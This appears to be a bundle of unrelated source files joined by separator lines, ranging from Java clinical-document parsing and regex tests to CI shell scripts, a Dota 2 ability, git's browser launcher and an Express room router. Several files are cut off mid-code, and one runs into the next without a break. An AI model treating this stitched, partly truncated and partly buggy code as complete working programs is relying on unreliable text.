        List<POCDMT000040InfrastructureRootTemplateId> templatet = clinicalDocument.getTemplateIds();
        if ( templatet != null && !templatet.isEmpty() ) {
            String id = templatet.get(0).getRoot();
            laakemaarays.setAsiakirjaVersio(id);
            if ( versioUtil == null ) {
                versioUtil = new AsiakirjaVersioUtil(loadProperties());
            }
            laakemaarays.setAsiakirjaYhteensopivuus(versioUtil.getAsiakirjaVersionYhteensopivuus(id));
        }
    }

    /**
     * Sets the document-version utility from outside. Intended mainly to ease
     * testing.
     *
     * @param versioUtil
     * @deprecated
     */
    @Deprecated
    protected void setVersioUtil(AsiakirjaVersioUtil versioUtil) {
        this.versioUtil = versioUtil;
    }

    /**
     * Extracts the display-form (narrative) text of a section: collects the
     * string content of every paragraph's content elements into the given list.
     */
    protected void puraText(POCDMT000040Section section, List<String> nayttomuoto) {
        StrucDocText text = section.getText();
        if ( text != null && text.getContent() != null && !text.getContent().isEmpty() ) {
            List<Serializable> content = text.getContent();
            for (int i = 0; i < content.size(); i++) {
                if ( !(content.get(i) instanceof JAXBElement) ) {
                    continue;
                }
                JAXBElement<?> elem = (JAXBElement<?>) content.get(i);
                if ( elem.getValue() instanceof StrucDocParagraph ) {
                    StrucDocParagraph paragraph = (StrucDocParagraph) elem.getValue();
                    puraDocParagraph(paragraph, nayttomuoto);
                }
            }
        }
    }

    /**
     * Collects the narrative content elements of a single paragraph into the
     * given list.
     */
    protected void puraDocParagraph(StrucDocParagraph paragraph, List<String> nayttomuoto) {
        List<Serializable> content = paragraph.getContent();
        for (int i = 0; i < content.size(); i++) {
            if ( content.get(i) instanceof JAXBElement ) {
                JAXBElement<?> elem = (JAXBElement<?>) content.get(i);
                if ( elem.getValue() instanceof StrucDocContent ) {
                    StrucDocContent doc = (StrucDocContent) elem.getValue();
                    puraDocContent(doc, nayttomuoto);
                }
            }
        }
    }

    /**
     * Appends every plain string inside a narrative content element to the
     * given list.
     */
    protected void puraDocContent(StrucDocContent content, List<String> nayttomuoto) {
        List<Serializable> cont = content.getContent();
        for (int i = 0; i < cont.size(); i++) {
            if ( cont.get(i) instanceof String ) {
                String arvo = (String) cont.get(i);
                nayttomuoto.add(arvo);
            }
        }
    }

    /**
     * Fetches the templateIds from the clinicalDocument structure
     * component/structuredBody/component.
     *
     * @param clinicalDocument
     *            POCDMT00040ClinicalDocument the ids are fetched from
     * @return POCDMT000040InfrastructureRootTemplateId list; empty when the
     *         structure is not present
     */
    private List<POCDMT000040InfrastructureRootTemplateId> haeStructuredBodyTemplateIs(
            POCDMT000040ClinicalDocument clinicalDocument) {
        if ( null == clinicalDocument || null == clinicalDocument.getComponent()
                || null == clinicalDocument.getComponent().getStructuredBody()
                || clinicalDocument.getComponent().getStructuredBody().getComponents().isEmpty() || clinicalDocument
                        .getComponent().getStructuredBody().getComponents().get(0).getTemplateIds().isEmpty() ) {
            return new ArrayList<POCDMT000040InfrastructureRootTemplateId>();
        }
        return clinicalDocument.getComponent().getStructuredBody().getComponents().get(0).getTemplateIds();
    }
}
|
#!/bin/bash
set -e

# First CLI argument toggles the mailcatcher container ("true" to enable).
MAILCATCHER=$1

# Resolve the repository root (three levels up from this script's directory).
DIRPATH="$(cd "$(dirname "${BASH_SOURCE[0]}")" && cd ../../.. && pwd)"

# Bug fix: quote the path so the script works when the checkout path
# contains spaces (the original unquoted expansion would word-split).
chmod +x "${DIRPATH}/deploy/ci/travis/run-e2e-tests.sh"

# We will install ffmpeg so we can capture a video of the display as the tests run
sudo add-apt-repository -y ppa:mc3man/trusty-media
sudo apt-get -qq update

if [ "${MAILCATCHER}" == "true" ]; then
  docker run -d -p 1080:80 -p 1025:25 --name mail tophfr/mailcatcher
fi
|
<reponame>jaden-young/NWR
import { BaseAbility, BaseModifier, BaseModifierMotionHorizontal, registerAbility, registerModifier } from "../../../lib/dota_ts_adapter"
// 3D coordinate payload passed through the modifier-creation kv table
// (see AddNewModifier in OnSpellStart and OnCreated below).
interface kv {
    x: number;
    y: number;
    z: number;
}
// Dota 2 custom ability: dashes the caster toward the cursor position by
// applying the modifier_haku_demonic_speed motion modifier.
@registerAbility()
export class haku_demonic_speed extends BaseAbility
{
    lightning_blade_fx?: ParticleID;
    active_target?: CDOTA_BaseNPC;

    /****************************************/
    // Preload the particle and sound resources this ability uses.
    Precache(context: CScriptPrecacheContext): void{
        PrecacheResource("particle", "particles/units/heroes/haku/haku_demonic_speed.vpcf", context);
        PrecacheResource("soundfile", "soundevents/heroes/haku/game_sounds_haku.vsndevts", context);
        //PrecacheResource("soundfile", "soundevents/heroes/haku/game_sounds_vo_haku.vsndevts", context);
    }

    /****************************************/
    // Server reports an effectively unlimited cast range (50000); the real
    // travel distance is clamped in OnSpellStart. Client uses the KV value.
    GetCastRange(location: Vector, target: CDOTA_BaseNPC | undefined): number {
        return IsClient() ? super.GetCastRange(location, target) : 50000;
    }

    /****************************************/
    OnSpellStart(): void {
        let caster = this.GetCaster();
        let position = this.GetCursorPosition();
        let origin = caster.GetAbsOrigin();
        let range = this.GetSpecialValueFor("cast_range");
        let distance = (position - origin as Vector).Length2D();

        // Clamp the destination to at most cast_range away from the caster.
        position = distance < range ? position : (position - origin as Vector).Normalized() * range + origin as Vector;

        // The destination is passed to the modifier through the kv table.
        caster.AddNewModifier(caster, this, "modifier_haku_demonic_speed", {duration: -1, x: position.x, y: position.y, z: position.z})
        EmitSoundOn("Hero_Haku.DemonicSpeed.Cast", caster);
    }
}
// Motion modifier: moves the caster in a straight line toward the stored
// destination, attacking the first enemy found near the path, and removes
// itself on arrival or interruption.
@registerModifier()
export class modifier_haku_demonic_speed extends BaseModifierMotionHorizontal
{
    position?: Vector;          // dash destination (from kv)
    origin?: Vector;            // start point, used to measure travelled distance
    speed?: number;             // travel speed in units/second
    search_radius?: number;     // enemy search radius while dashing
    distance_to_cross?: number; // total distance from origin to destination

    /****************************************/
    IsPurgable(): boolean {return false}
    RemoveOnDeath(): boolean {return true}

    /****************************************/
    OnCreated(params: kv): void {
        let ability = this.GetAbility()!;
        let parent = this.GetParent();

        // NOTE(review): speed is hard-coded to 1900; the commented-out
        // expression suggests it was meant to come from the "speed" special
        // value — confirm against the ability KV file.
        this.speed = 1900//ability.GetSpecialValueFor("speed");
        this.search_radius = ability.GetSpecialValueFor("attack_search_range");

        if (!IsClient()) return;
#!/bin/bash

# CI helper: compiles every NEORV32 example project, the bootloader and the
# CPU test application, then writes the expected simulation output string.

# Abort if any command returns != 0
set -e

# NEORV32 project home folder
homedir="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )"
homedir=$homedir/..

# The directories of the SW source files
srcdir_examples=$homedir/sw/example
srcdir_bootloader=$homedir/sw/bootloader
test_app_dir=$homedir/sw/example/cpu_test

# List files
ls -al $srcdir_examples
ls -al $srcdir_bootloader

# check toolchain
make -C $test_app_dir check

# Compile all example projects
make -C $srcdir_examples clean_all compile

# Compile and install bootloader
make -C $srcdir_bootloader clean_all info bootloader

# Compile and install test application
# Redirect UART TX to DEVNULL.simulation_output via <DEVNULL_UART_OVERRIDE> user flag
echo "Installing test application"
make -C $test_app_dir clean_all USER_FLAGS+=-DDEVNULL_UART_OVERRIDE MARCH=-march=rv32imc info all

# Verification reference string
# The simulator output is later diffed against this file's contents.
touch $homedir/check_reference.out
chmod 777 $homedir/check_reference.out
echo "TEST OK!" > $homedir/check_reference.out
|
# Demo: spelling correction via fuzzy string matching.
import difflib

# Candidate vocabulary and the (misspelled) word to correct.
# Renamed from `Dict`: PascalCase names are reserved for classes and the old
# name collided with the typing.Dict convention.
dictionary = ['Apple', 'Orange', 'Banana', 'Grape']
word = 'Appel'

# get_close_matches ranks candidates by similarity ratio
# (defaults: at most 3 matches, similarity cutoff 0.6).
best_matches = difflib.get_close_matches(word, dictionary)

# output
print('Closest matches:', best_matches)
/**
 * Plain credentials holder serializable to a JSON string.
 */
export class CredentialsModel {
    /**
     * @param username account name (defaults to empty string)
     * @param password clear-text password (defaults to empty string)
     */
    constructor(public username: string = "", public password: string = "") {}

    /**
     * Serializes the credentials as a JSON object string.
     *
     * Bug fix: the previous implementation concatenated the raw values into a
     * JSON-looking string by hand, producing invalid JSON whenever a value
     * contained quotes or backslashes. JSON.stringify escapes them correctly.
     */
    toString(): string {
        return JSON.stringify({ username: this.username, password: this.password });
    }
}
|
export type OtherState = {
depthTestAgainstTerrain: boolean
}
export const defaultState = (): OtherState => {
return {
depthTestAgainstTerrain: true,
}
}
export const state: OtherState = defaultState()
|
#!/bin/sh
#
# This program launch a web browser on the html page
# describing a git command.
#
# Copyright (c) 2007 Christian Couder
# Copyright (c) 2006 Theodore Y. Ts'o
#
# This file is heavily stolen from git-mergetool.sh, by
# Theodore Y. Ts'o (thanks) that is:
#
# Copyright (c) 2006 Theodore Y. Ts'o
#
# This file is licensed under the GPL v2, or a later version
# at the discretion of Junio C Hamano or any other official
# git maintainer.
#
# Usage string shown by the git-sh-setup `usage` helper.
USAGE='[--browser=browser|--tool=browser] [--config=conf.var] url/file ...'

# This must be capable of running outside of git directory, so
# the vanilla git-sh-setup should not be used.
NONGIT_OK=Yes
. git-sh-setup
# Succeeds when a custom command is configured for browser "$1"
# (browser.<name>.cmd).  Side effect: leaves the command in the global
# $browser_cmd variable, which the dispatch code at the bottom relies on.
valid_custom_tool()
{
	browser_cmd="$(git config "browser.$1.cmd")"
	test -n "$browser_cmd"
}
# Succeeds when "$1" is a browser this script knows how to drive, or when a
# custom browser.<name>.cmd is configured for it.
valid_tool() {
	case "$1" in
	firefox | iceweasel | seamonkey | iceape | \
	chrome | google-chrome | chromium | chromium-browser |\
	konqueror | opera | w3m | elinks | links | lynx | dillo | open | start)
		;; # happy
	*)
		valid_custom_tool "$1" || return 1
		;;
	esac
}
# Resolves the executable path for browser "$1" into the global $browser_path,
# honoring the browser.<name>.path config; falls back to the browser name
# itself.  Special-cases Debian's chromium-browser binary name.
init_browser_path() {
	browser_path=$(git config "browser.$1.path")
	if test -z "$browser_path" &&
	   test "$1" = chromium &&
	   type chromium-browser >/dev/null 2>&1
	then
		browser_path=chromium-browser
	fi
	: ${browser_path:="$1"}
}
# Parse command-line options: -b/--browser/-t/--tool select the browser,
# -c/--config names a git config variable to consult for the default.
while test $# != 0
do
	case "$1" in
	-b|--browser*|-t|--tool*)
		case "$#,$1" in
		*,*=*)
			browser=`expr "z$1" : 'z-[^=]*=\(.*\)'`
			;;
		1,*)
			usage ;;
		*)
			browser="$2"
			shift ;;
		esac
		;;
	-c|--config*)
		case "$#,$1" in
		*,*=*)
			conf=`expr "z$1" : 'z-[^=]*=\(.*\)'`
			;;
		1,*)
			usage ;;
		*)
			conf="$2"
			shift ;;
		esac
		;;
	--)
		break
		;;
	-*)
		usage
		;;
	*)
		break
		;;
	esac
	shift
done

test $# = 0 && usage

# No browser given on the command line: fall back to the requested config
# variable and then to web.browser; discard unknown values.
if test -z "$browser"
then
	for opt in "$conf" "web.browser"
	do
		test -z "$opt" && continue
		browser="`git config $opt`"
		test -z "$browser" || break
	done
	if test -n "$browser" && ! valid_tool "$browser"; then
		echo >&2 "git config option $opt set to unknown browser: $browser"
		echo >&2 "Resetting to default..."
		unset browser
	fi
fi

# Still no browser: auto-detect one from a platform-dependent candidate list.
if test -z "$browser" ; then
	if test -n "$DISPLAY"; then
		browser_candidates="firefox iceweasel google-chrome chrome chromium chromium-browser konqueror opera seamonkey iceape w3m elinks links lynx dillo"
		if test "$KDE_FULL_SESSION" = "true"; then
			browser_candidates="konqueror $browser_candidates"
		fi
	else
		browser_candidates="w3m elinks links lynx"
	fi
	# SECURITYSESSIONID indicates an OS X GUI login session
	if test -n "$SECURITYSESSIONID" \
		-o "$TERM_PROGRAM" = "Apple_Terminal" ; then
		browser_candidates="open $browser_candidates"
	fi
	# /bin/start indicates MinGW
	if test -x /bin/start; then
		browser_candidates="start $browser_candidates"
	fi
	for i in $browser_candidates; do
		init_browser_path $i
		if type "$browser_path" > /dev/null 2>&1; then
			browser=$i
			break
		fi
	done
	test -z "$browser" && die "No known browser available."
else
	valid_tool "$browser" || die "Unknown browser '$browser'."

	init_browser_path "$browser"

	if test -z "$browser_cmd" && ! type "$browser_path" > /dev/null 2>&1; then
		die "The browser $browser is not available as '$browser_path'."
	fi
fi

# Launch the chosen browser with the browser-specific invocation quirks.
case "$browser" in
firefox|iceweasel|seamonkey|iceape)
	# Check version because firefox < 2.0 does not support "-new-tab".
	vers=$(expr "$($browser_path -version)" : '.* \([0-9][0-9]*\)\..*')
	NEWTAB='-new-tab'
	test "$vers" -lt 2 && NEWTAB=''
	"$browser_path" $NEWTAB "$@" &
	;;
google-chrome|chrome|chromium|chromium-browser)
	# No need to specify newTab. It's default in chromium
	eval "$browser_path" "$@" &
	;;
konqueror)
	case "$(basename "$browser_path")" in
	konqueror)
		# It's simpler to use kfmclient to open a new tab in konqueror.
		browser_path="$(echo "$browser_path" | sed -e 's/konqueror$/kfmclient/')"
		type "$browser_path" > /dev/null 2>&1 || die "No '$browser_path' found."
		eval "$browser_path" newTab "$@"
		;;
	kfmclient)
		eval "$browser_path" newTab "$@"
		;;
	*)
		"$browser_path" "$@" &
		;;
	esac
	;;
w3m|elinks|links|lynx|open)
	eval "$browser_path" "$@"
	;;
start)
	exec "$browser_path" '"web-browse"' "$@"
	;;
opera|dillo)
	"$browser_path" "$@" &
	;;
*)
	# Custom tool: $browser_cmd was populated by valid_custom_tool above.
	if test -n "$browser_cmd"; then
		( eval $browser_cmd "$@" )
	fi
	;;
esac
|
<reponame>learnforpractice/micropython-cpp
# Sets are unordered; sorted() returns a new ordered list in one step,
# replacing the manual list(...) + .sort() two-step.
s = {1, 2, 3, 4}
l = sorted(s)
print(l)
|
#!/bin/bash
# Copyright 2015-2016 Sarah Flora Juan
# Copyright 2016 Johns Hopkins University (Author: Yenda Trmal)
# Copyright 2017 Radboud University (Author: Emre Yilmaz)
# Apache 2.0

# Prepares Kaldi train/devel/test data directories from the FAME! speech
# corpus and copies its language model into data/local.

corpus=$1
set -e -o pipefail

if [ -z "$corpus" ] ; then
    echo >&2 "The script $0 expects one parameter -- the location of the FAME! speech database"
    exit 1
fi
if [ ! -d "$corpus" ] ; then
    echo >&2 "The directory $corpus does not exist"
    # Bug fix: the script previously fell through and kept running after this
    # fatal condition; abort instead.
    exit 1
fi

echo "Preparing train, development and test data"
mkdir -p data data/local data/train_asr data/devel_asr data/test_asr

for x in train devel test; do
    echo "Copy spk2utt, utt2spk, wav.scp, text for $x"
    cp $corpus/data/$x/text data/${x}_asr/text || exit 1;
    cp $corpus/data/$x/spk2utt data/${x}_asr/spk2utt || exit 1;
    cp $corpus/data/$x/utt2spk data/${x}_asr/utt2spk || exit 1;

    # the corpus wav.scp contains physical paths, so we just re-generate
    # the file again from scratchn instead of figuring out how to edit it
    for rec in $(awk '{print $1}' $corpus/data/$x/text) ; do
        spk=${rec%_*}
        filename=$corpus/fame/wav/${x}/${rec:8}.wav
        if [ ! -f "$filename" ] ; then
            echo >&2 "The file $filename could not be found ($rec)"
            exit 1
        fi
        # we might want to store physical paths as a general rule
        filename=$(readlink -f $filename)
        echo "$rec $filename"
    done > data/${x}_asr/wav.scp

    # fix_data_dir.sh fixes common mistakes (unsorted entries in wav.scp,
    # duplicate entries and so on). Also, it regenerates the spk2utt from
    # utt2sp
    utils/fix_data_dir.sh data/${x}_asr
done

echo "Copying language model"
if [ -f $corpus/lm/LM_FR_IKN3G ] ; then
    gzip -c $corpus/lm/LM_FR_IKN3G > data/local/LM.gz
fi

echo "Data preparation completed."
|
<reponame>edgggeTRON/cardano-explorer-app
import React from 'react';
import { ensureContextExists } from '../../lib/react/hooks';
import { ITransactionsFeature } from './index';
/**
 * React context carrying the transactions feature instance for this subtree.
 */
export const transactionsContext = React.createContext<ITransactionsFeature | null>(null);

/**
 * Hook used by container components to obtain the feature instance
 * configured by the context provider; throws if no provider is mounted
 * (behavior supplied by ensureContextExists).
 */
export function useTransactionsFeature(): ITransactionsFeature {
  return ensureContextExists<ITransactionsFeature>(transactionsContext);
}
|
#!/bin/bash
#
# Copyright 2012 Marco Vermeulen, Jacky Chan
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# update jenv self
# Re-runs the selfupdate command, re-initializes the shell integration for the
# current shell, and then refreshes the local candidate repository metadata.
function __jenvtool_selfupdate {
	source "${JENV_DIR}/commands/selfupdate.sh"
	source "${JENV_DIR}/bin/jenv-init.sh" ${JENV_SHELL}
	__jenvtool_repo "update"
}
|
// Minimal jQuery-style Deferred/when implementation: watch a group of
// promises and run done callbacks when all resolve, or fail callbacks when
// any rejects.
// NOTE(review): `slice` is referenced bare (slice.call(arguments)); it is
// presumably an alias for Array.prototype.slice defined elsewhere in the
// file — confirm, otherwise `when`/`done`/`fail` throw a ReferenceError.
var Waiter = function(){
    var dfd = [],       // promises currently being watched by when()
        doneArr = [],   // callbacks queued for the all-resolved case
        failArr = [],   // callbacks queued for the first-rejected case
        that = this,
        debug = true,
        // Run each callback in order, logging (not rethrowing) errors.
        // NOTE(review): the while condition itself stops at the first falsy
        // entry, so callbacks placed after a null/undefined item never run.
        _exec = function(arr){
            var i = 0, c;
            arr = arr || [];
            while(c = arr[i++]){
                try{
                    c && c();
                }catch(e){ debug && console && console.info(e) }
            }
        };
    // A watchable promise with resolved/rejected flags.
    var Promise = function(){
        this.resolved = false;
        this.rejected = false;
    }
    Promise.prototype = {
        resolve: function(){
            this.resolved = true;
            if(!dfd.length){
                return;
            }
            // Bail out while any watched promise is still pending or rejected.
            for(var i = dfd.length - 1;i >= 0;i--){
                if(dfd[i] && !dfd[i].resolved || dfd[i].rejected){
                    return;
                }
                // splice() adds/removes items in place and returns the removed
                // items; unlike slice(), splice() modifies the array directly.
                dfd.splice(i, 1);
            }
            _exec(doneArr);
        },
        reject: function(){
            this.rejected = true;
            if(!dfd.length){
                return;
            }
            // Clear all watched promises
            dfd.splice(0);
            _exec(failArr);
        }
    }
    // Factory for a new watchable promise.
    that.Deferred = function(){
        return new Promise();
    }
    // Register the promises to watch; already-settled or non-Promise values
    // are dropped from the watch list.
    that.when = function(){
        dfd = slice.call(arguments);
        var i = dfd.length;
        for(--i; i >= 0;i--){
            if(!dfd[i] || dfd[i].resolved || dfd[i].rejected || !dfd[i] instanceof Promise){
                dfd.splice(i, 1);
            }
        }
        // console.log('dfd: ', dfd);
        return that;
    }
    // Queue success callbacks; chainable.
    that.done = function(){
        doneArr = doneArr.concat(slice.call(arguments));
        // console.log('doneArr: ', doneArr);
        return that;
    }
    // Queue failure callbacks; chainable.
    that.fail = function(){
        failArr = failArr.concat(slice.call(arguments));
        // console.log('failArr: ', failArr);
        return that;
    }
}
// TODO: for debug
// test
// Manual smoke test: three timed promises — the first two resolve (2s,
// 3s), the third rejects at 4s, at which point the fail callbacks fire.
var waiter = new Waiter();
var first = function(){
    var dtd = waiter.Deferred();
    setTimeout(function(){
        console.log('frist time');
        dtd.resolve();
    }, 2000);
    return dtd;
}()
var second = function(){
    var dtd = waiter.Deferred();
    setTimeout(function(){
        console.log('second time');
        dtd.resolve();
    }, 3000);
    return dtd;
}()
var three = function(){
    var dtd = waiter.Deferred();
    setTimeout(function(){
        console.log('fail');
        dtd.reject();
    }, 4000);
    return dtd;
}()
// done() accepts several success callbacks; fail() is passed a null in
// the middle on purpose to exercise null tolerance.
waiter.when(first, second, three).done(function(){
    console.log('success');
}, function(){
    console.log('success again');
}).fail(function(){
    console.log('one fail');
}, null, function(){
    console.log('three fail');
});
// Polling (commented-out example)
// (function getAjaxData(){
//     // Save a reference to the current function
//     // (note: arguments.callee is deprecated in strict mode)
//     var fn = arguments.callee;
//     setTimeout(function(){
//         console.log('query again');
//         // run again
//         fn();
//     }, 5000);
// })();
|
package com.utn;
public class Arma {
private int danio;
public Arma(int danio) {
this.danio = danio;
}
public int getDanio() {
return danio;
}
@Override
public String toString() {
return "danio=" + danio;
}
}
|
<filename>test/Regex.java
import java.util.regex.Matcher;
import java.util.regex.Pattern;
/**
 * Self-contained regression tests for java.util.regex. Every expect*
 * helper throws a RuntimeException on failure, so running main() to
 * completion means all checks passed.
 */
public class Regex {
    /** Fail fast: throw when a check does not hold. */
    private static void expect(boolean v) {
        if (! v) throw new RuntimeException();
    }

    /** Compile the pattern and return a matcher over the whole string. */
    private static Matcher getMatcher(String regex, String string) {
        return Pattern.compile(regex).matcher(string);
    }

    /** Assert the regex matches the entire input string. */
    private static void expectMatch(String regex, String string) {
        expect(getMatcher(regex, string).matches());
    }

    /** Assert the regex does NOT match the entire input string. */
    private static void expectNoMatch(String regex, String string) {
        expect(!getMatcher(regex, string).matches());
    }

    /**
     * Assert a full match whose capture groups equal the given values.
     * A null entry means the corresponding group did not participate in
     * the match.
     */
    private static void expectGroups(String regex, String string,
                                     String... groups) {
        Matcher matcher = getMatcher(regex, string);
        expect(matcher.matches());
        expect(matcher.groupCount() == groups.length);
        // Group numbering is 1-based; group 0 is the whole match.
        for (int i = 1; i <= groups.length; ++i) {
            if (groups[i - 1] == null) {
                expect(matcher.group(i) == null);
            } else {
                expect(groups[i - 1].equals(matcher.group(i)));
            }
        }
    }

    /** Assert that successive find() calls yield exactly these substrings. */
    private static void expectFind(String regex, String string,
                                   String... matches)
    {
        Matcher matcher = getMatcher(regex, string);
        int i = 0;
        while (i < matches.length) {
            expect(matcher.find());
            expect(matches[i++].equals(matcher.group()));
        }
        // No further matches allowed.
        expect(!matcher.find());
    }

    /** Assert that Pattern.split produces exactly this list of pieces. */
    private static void expectSplit(String regex, String string,
                                    String... list)
    {
        String[] array = Pattern.compile(regex).split(string);
        expect(array.length == list.length);
        for (int i = 0; i < list.length; ++ i) {
            expect(list[i].equals(array[i]));
        }
    }

    public static void main(String[] args) {
        // Optional groups, quantifier greediness, dot semantics.
        expectMatch("a(bb)?a", "abba");
        expectNoMatch("a(bb)?a", "abbba");
        expectNoMatch("a(bb)?a", "abbaa");
        expectGroups("a(a*?)(a?)(a??)(a+)(a*)a", "aaaaaa", "", "a", "", "aaa", "");
        expectMatch("...", "abc");
        expectNoMatch(".", "\n");
        expectGroups("a(bb)*a", "abbbba", "bb");
        expectGroups("a(bb)?(bb)+a", "abba", null, "bb");
        expectFind(" +", "Hello , world! ", " ", " ", " ");
        // Character classes, non-capturing groups, alternation.
        expectMatch("[0-9A-Fa-f]+", "08ef");
        expectNoMatch("[0-9A-Fa-f]+", "08@ef");
        expectGroups("(?:a)", "a");
        expectGroups("a|(b|c)", "a", (String)null);
        expectGroups("a|(b|c)", "c", "c");
        // Lookahead / lookbehind.
        expectGroups("(?=a)a", "a");
        expectGroups(".*(o)(?<=[A-Z][a-z]{1,4})", "Hello", "o");
        expectNoMatch("(?!a).", "a");
        // Escapes: octal, \a, backslash, hex.
        expectMatch("[\\d]", "0");
        expectMatch("\\0777", "?7");
        expectMatch("\\a", "\007");
        expectMatch("\\\\", "\\");
        expectMatch("\\x4A", "J");
        expectMatch("\\x61", "a");
        expectMatch("\\078", "\0078");
        // Splitting on zero-width boundaries, class unions/intersections.
        expectSplit("(?<=\\w)(?=\\W)|(?<=\\W)(?=\\w)", "a + b * x",
                    "a", " + ", "b", " * ", "x");
        expectMatch("[0-9[def]]", "f");
        expectNoMatch("[a-z&&[^d-f]]", "f");
        expectSplit("^H", "Hello\nHobbes!", "", "ello\nHobbes!");
        expectSplit("o.*?$", "Hello\r\nHobbes!", "Hello\r\nH");
        try {
            expectSplit("\\b", "a+ b + c\nd", "", "a", "+ ", "b", " + ", "c", "\n", "d");
        } catch (RuntimeException e) {
            // Java 8 changed the semantics of split, so if we're on 8, the
            // above will fail and this will succeed:
            expectSplit("\\b", "a+ b + c\nd", "a", "+ ", "b", " + ", "c", "\n", "d");
        }
        expectSplit("\\B", "Hi Cal!", "H", "i C", "a", "l!");
        // Bounded repetition and lazy quantifiers.
        expectMatch("a{2,5}", "aaaa");
        expectGroups("a??(a{2,5}?)", "aaaa", "aaaa");
        expectGroups("a??(a{3}?)", "aaaa", "aaa");
        expectNoMatch("a(a{3}?)", "aaaaa");
        expectMatch("a(a{3,}?)", "aaaaa");
    }
}
|
<filename>INFO/Books Codes/Oracle Wait Interface A Practical Guide to Performance Diagnostics & Tuning/Chapter5_page130_1.sql
-- System-wide wait statistics for the buffer-write related events
-- (DBWR writes, free buffer waits, write complete waits) from
-- v$system_event. Units of time_waited/average_wait depend on the
-- Oracle release -- TODO confirm for the target version.
select event, time_waited, average_wait
from v$system_event
where event in ('db file parallel write','free buffer waits',
'write complete waits');
|
/*
*
*/
package net.community.chest.win32.core.serial;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.io.StreamCorruptedException;
import net.community.chest.CoVariantReturn;
import net.community.chest.io.encode.ElementEncoder;
import net.community.chest.lang.PubliclyCloneable;
import net.community.chest.reflect.ClassUtil;
import net.community.chest.util.compare.AbstractComparator;
/**
* <P>Copyright as per GPLv2</P>
* @author <NAME>.
* @since Feb 19, 2013 3:13:42 PM
*
*/
public class MemberPrimitiveTypedRecord extends SerializationRecord
        implements PubliclyCloneable<MemberPrimitiveTypedRecord>,
                   ElementEncoder<MemberPrimitiveTypedRecord> {
    private static final long serialVersionUID = -5617681741365737337L;

    // Type tag of the serialized member, written before the value itself.
    private PrimitiveTypeEnumeration _primitiveType;
    // Decoded member value; the runtime type depends on _primitiveType.
    private Object _value;

    /** Creates an empty record tagged as MemberPrimitiveTyped. */
    public MemberPrimitiveTypedRecord ()
    {
        super(RecordTypeEnumeration.MemberPrimitiveTyped);
    }

    /**
     * Decodes a record directly from the given stream.
     *
     * @param in stream positioned at the record data
     * @throws IOException on read failure
     * @throws StreamCorruptedException if the decoded instance is not
     * this object
     */
    public MemberPrimitiveTypedRecord (InputStream in) throws IOException
    {
        super(RecordTypeEnumeration.MemberPrimitiveTyped);

        Object result=read(in);
        if (result != this)
            throw new StreamCorruptedException("Mismatched read data instance");
    }

    /** @return the type tag of the serialized member (may be null) */
    public PrimitiveTypeEnumeration getPrimitiveType ()
    {
        return _primitiveType;
    }

    public void setPrimitiveType (PrimitiveTypeEnumeration primitiveType)
    {
        _primitiveType = primitiveType;
    }

    /** @return the decoded member value (may be null) */
    public Object getValue ()
    {
        return _value;
    }

    public void setValue (Object value)
    {
        _value = value;
    }

    @Override
    @CoVariantReturn
    public MemberPrimitiveTypedRecord read (InputStream in) throws IOException
    {
        return getClass().cast(super.read(in));
    }

    /**
     * Reads the type tag and then the value payload, storing both.
     */
    @Override
    public void readRecordData (InputStream in) throws IOException
    {
        PrimitiveTypeEnumeration dataType=PrimitiveTypeEnumeration.read(in);
        setPrimitiveType(dataType);
        logInternal("type=" + getPrimitiveType());

        setValue(dataType.readValue(in));
        logInternal("value=" + getValue());
    }

    /**
     * Writes the type tag followed by the value payload.
     *
     * @throws StreamCorruptedException if no type tag has been set
     */
    @Override
    public void writeRecordData (OutputStream out) throws IOException
    {
        PrimitiveTypeEnumeration dataType=getPrimitiveType();
        if (dataType == null)
            throw new StreamCorruptedException("No data type provided");

        dataType.write(out);
        dataType.writeValue(out, getValue());
    }

    @Override
    @CoVariantReturn
    public MemberPrimitiveTypedRecord clone () throws CloneNotSupportedException
    {
        return getClass().cast(super.clone());
    }

    @Override
    public int hashCode ()
    {
        return super.hashCode()
             + ClassUtil.getObjectHashCode(getPrimitiveType())
             + ClassUtil.getObjectHashCode(getValue())
             ;
    }

    @Override
    public boolean equals (Object obj)
    {
        if (!super.equals(obj))
            return false;
        if (this == obj)
            return true;

        // Compare the member fields directly (the original wrapped this
        // condition in an if/else that returned literal true/false).
        MemberPrimitiveTypedRecord other=(MemberPrimitiveTypedRecord) obj;
        return AbstractComparator.compareObjects(getPrimitiveType(), other.getPrimitiveType())
            && AbstractComparator.compareObjects(getValue(), other.getValue());
    }

    @Override
    public String toString ()
    {
        return super.toString()
             + ";type=" + getPrimitiveType()
             + ";value=" + getValue()
             ;
    }
}
|
#!/bin/sh
# Cross-check that every option declared in ../src/options.hpp is
# actually referenced (as opts.<name>) somewhere in the sources; any
# unreferenced option name is reported.
# The sed filter keeps only the option-declaration macro lines, strips
# the macro prefix, and cuts at the first comma to isolate the name.
sed \
    -e '/^[OLQ[A-Z]*(/!d' \
    -e 's,^[OLQ[A-Z]*(,,' \
    -e 's/,.*//' \
    ../src/options.hpp | \
while read option
do
    # Used at least once -> fine; otherwise report it.
    grep -q opts.$option ../src/*.hpp ../src/*.cpp && continue
    echo "option '$option' not found"
done
|
<filename>quizzer-server/routes/rooms.js
const mongoose = require("mongoose");
const express = require("express");
const router = express.Router();
// Presumably registers the Rooms schema as a side effect -- the binding
// itself is unused below.
const rooms = require("../models/rooms.js");
// NOTE(review): unused import.
const { Router } = require("express");
const Rooms = mongoose.model("Rooms");
// middleware that is specific to this router
// Logs every request entering the /rooms router, then continues.
router.use(function (req, res, next) {
  console.log("Entered /rooms");
  next();
});
// routers
// Health-check style endpoint: always answers 200 OK.
router.get("/", (req, res) => {
  res.sendStatus(200);
});
// Create a new room with a random numeric code; responds with the code
// as JSON ({ roomid }), or 500 if the insert fails.
router.post("/", function (req, res) {
  // Copyright <NAME>
  // NOTE(review): the loop runs 7 times (i = 0..6 inclusive), producing
  // a 7-digit code -- confirm this is intentional and not an off-by-one
  // for a 6-digit code.
  let roomcode = "";
  let possible = "0123456789";
  for (let i = 0; i <= 6; i++) {
    roomcode += possible.charAt(Math.floor(Math.random() * possible.length));
  }
